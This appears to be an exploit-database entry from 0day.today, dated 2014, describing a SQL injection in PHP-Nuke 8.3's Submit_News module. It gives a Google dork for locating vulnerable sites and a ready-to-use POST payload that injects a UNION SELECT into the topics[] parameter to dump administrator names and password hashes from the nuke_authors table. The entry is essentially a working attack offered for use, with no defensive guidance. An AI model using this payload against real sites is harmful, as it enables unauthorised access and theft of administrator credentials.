phpnuke 8.3 Sql Injection Vulnerability

2014-05-25T00:00:00
ID 1337DAY-ID-22277
Type zdt
Reporter snip3r_ir
Modified 2014-05-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [*] author : ali ahmady -- Iranian security researcher
[*] email : snip3r_ir[at]hotmail.com
[*] greets : b0x , Phantom_X , VIRkid , [email protected] , zeus REKCAH , milad22
[*] google dork : inurl: modules.php?name=Submit_News
[*] at post review level you can inject topic[] parameter.
[*] exploit code : subject=whatever&topics%5B%5D=-1' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+&alanguage=english&story=whatever
[*] tool : live http header

#  0day.today [2018-01-10]  #